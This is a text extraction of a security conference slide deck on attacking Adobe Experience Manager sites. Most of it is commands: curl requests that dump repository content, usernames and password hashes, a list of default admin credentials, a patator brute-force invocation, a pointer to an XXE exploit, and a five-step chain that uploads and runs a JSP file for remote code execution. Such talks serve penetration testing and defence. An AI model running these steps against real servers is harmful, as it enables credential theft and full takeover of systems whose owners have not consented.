Anda di halaman 1dari 23

Hack1ng

Adobe Experience
Manager sites

Who is that guy?


Mikhail Egorov
Security researcher
Works in Odin (Parallels)
0ang3el (at) gma1l (d0t) com

Related Work
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/securitychecklist.html

What do we want
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification

Sensitive information from JCR


Use JsonRendererServlet
curl

-X GET http://127.0.0.1:8080/.json

curl

-X GET http://127.0.0.1:8080/.6.json

curl

-X GET http://127.0.0.1:8080/.tidy.6.json

curl

-X GET http://127.0.0.1:8080/.tidy.infinity.json

Installed OSGI bundles


List of all bundles
curl

-X GET http://127.0.0.1:8080/bin.tidy.infinity.json

QueryBuilder is your friend!


http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html

curl

-X GET http://127.0.0.1:8080/bin/querybuilder.json

Custom scripts
List customs scripts
curl

-X GET http://127.0.0.1:8080/apps.tidy.infinity.json

List compiled custom scripts from cache


curl

-X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json

Usernames
Dump content node properties
curl

-X GET http://127.0.0.1:8080/content.infinity.json

Use regular expression to extract usernames (pipe with prev command)


python -c 'import sys,re; print "\n".join([m.group(1) for m in
re.finditer("\".+?By\":\"(.+?)\"",sys.stdin.readlines()[0])])' |
sort u

Password hashes
Use QueryBuilder bundle

curl -X GET
http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel
ective&p.properties=rep:principalName%20rep:password&p.limit=100

Anonymous modification
Dump content node properties
curl

-X GET http://127.0.0.1:8080/content.infinity.json

Use regular expression to check (pipe with prev command)


python -c 'import sys,re; m =
re.search("\".+?By\":\"anonymous\"",sys.stdin.readlines()[0]); print
"Anon modification: ","Yes" if m else "No"'

Getting access
Try default user credentials: admin/admin, author/author,
anonymous/anonymous
Offline attack (brute hashes)
Online attack (POST servlet bundle)
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json
method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt
auth_type=basic -x ignore:code!=200 --threads 5

You have access, now what?


XSS
Not covered, sorry!
CSRF
DoS
Read local files
RCE

Webdav bundle, XXE


CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
Webdav OSGI bundle uses XML parser that is not properly initialized
Exploit - https://www.exploit-db.com/exploits/37110/

Webdav bundle, XXE


Out-of-bound exploitation
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

Pros: works with anonymous credentials


Cons: you need external server, instable

Inbound exploitation
Pros: you do not need external server, more stable
Cons: you need credentials of the user that is able to modify some node in JCR

Webdav bundle, XXE Demo

http://www.youtube.com/watch?v=Hg3AXoG89Gs

Remote code execution


We have node http://127.0.0.1:8080/rce
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}

We have script exec.jsp that is magically loaded into node


http://127.0.0.1:8080/apps/rcetype
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38
GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea
ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}

When someone navigates to http://127.0.0.1:8080/rce.exec our


exec.jsp will be executed.

Remote code execution


Step I: Create rcetype node
curl u admin:admin Fjcr:primaryType=nt:folder
http://127.0.0.1:8080/content/rcetype

Remote code execution


Step II: Upload script exec.jsp to rcetype node
curl u admin:admin Fexec.jsp=@RCE.jsp
http://127.0.0.1:8080/content/rcetype

Remote code execution


Step III: Copy rcetype to /apps
curl u admin:admin F:operation=copy F:dest=/apps/rcetype
http://127.0.0.1:8080/content/rcetype

Remote code execution


Step IV: Create rce node bound to rcetype
curl u admin:admin Fsling:resourceType=rcetype
http://127.0.0.1:8080/content/rce

Remote code execution


Step V: Launch jsp script
curl X GET http://127.0.0.1:8080/content/rce.exec

Remote code execution, Demo

http://www.youtube.com/watch?v=Z9n2T07e6Ls

Ask a Ninja